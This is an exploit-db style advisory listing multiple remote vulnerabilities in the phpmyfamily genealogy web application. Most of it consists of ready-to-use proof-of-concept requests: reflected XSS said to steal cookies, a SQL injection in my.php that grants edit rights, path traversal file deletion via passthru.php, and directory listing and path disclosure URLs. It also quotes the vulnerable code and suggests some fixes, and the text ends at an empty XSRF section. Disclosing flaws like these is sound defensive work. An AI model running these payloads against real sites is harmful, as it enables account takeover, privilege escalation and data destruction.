''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-17-phpmyfamily-multiple-remote-vulnerabilities/ ''' - Title : phpmyfamily Multiple Remote Vulnerabilities. - Affected Version : phpmyfamily <= 1.4.2 - Vendor Site : http://www.phpmyfamily.net/ - Discovery : Abysssec.com - Description : =============== phpmyfamily is a dynamic genealogy website builder which allows geographically dispersed family members to maintain a central database of research which is readily accessable and editable. By having a central repository, family members can contribute as and when information becomes available without requiring them to send it to a central 'custodian', or disseminate via email, and allows anecdotal information and possible leads to be shared. - Vulnerabilities: ================== 1)Information Disclosure: -------------------------- 1-1)Directory listing: +POC: http://site.com/phpmyfamily/admin/ http://site.com/phpmyfamily/docs/ http://site.com/phpmyfamily/images/ http://site.com/phpmyfamily/inc/ http://site.com/phpmyfamily/lang/ http://site.com/phpmyfamily/styles/ +Fix: Create index.html in all folders. 1-2)Cookie Info: User's Cookie contions username and MD5 password. 2)XSS: ------ +Example Vulnerable Code: inc/passwdform.inc.php[line41-42] @$reason = $_REQUEST["reason"]; echo "".$reason.""; +POC: This poc send victim's cookie(contions username and MD5 password) to attacker site. http://SITE.com/phpmyfamily/inc/passwdform.inc.php?reason= +other poc: a)census.php[line23-26] http://SITE.com/phpmyfamily/census.php?ref= b)mail.php[line 25-35] http://SITE.com/phpmyfamily/mail.php?referer= 3)Path Disclosure: -------------------------------------- +POC: http://SITE.com/phpmyfamily/admin.php?func=ged http://SITE.com/phpmyfamily/inc/gedcom.inc.php 4)SQL Injection: ------------- Code: :my.php[line 32-33] $query = "UPDATE ".$tblprefix."users SET email = '".$_POST["pwdEmail"]."' WHERE id = '".$_SESSION["id"]."'"; $result = mysql_query($query) or die(mysql_error()); +POC: http://SITE.com/phpmyfamily/my.php?func=email&pwdEmail=bbb@aa.com',edit='Y'%00
+Fix: use function quote_smart: $query = "UPDATE ".$tblprefix."users SET email = '".quote_smart($_POST["pwdEmail"])."' WHERE id = '".$_SESSION["id"]."'"; +other: track.php[line 145-148] http://SITE.com/phpmyfamily/track.php passthru.php [line 221-220] http://SITE.com/phpmyfamily/passthru.php and ... 5)Delete File: -------------- CMS's users can delete each file by this Vulnerability. +Code: passthru.php line[218-219] $docFile = "docs/".$_REQUEST["transcript"]; if (@unlink($docFile) || !file_exists($docFile)) +POC: http://SITE.com/phpmyfamily/passthru.php?func=delete&area=transcript&person=00002&transcript=../../../file.ext +Fix: use function quote_smart: $docFile = "docs/".quote_smart($_REQUEST["transcript"]); 6)XSRF: ------- +POC: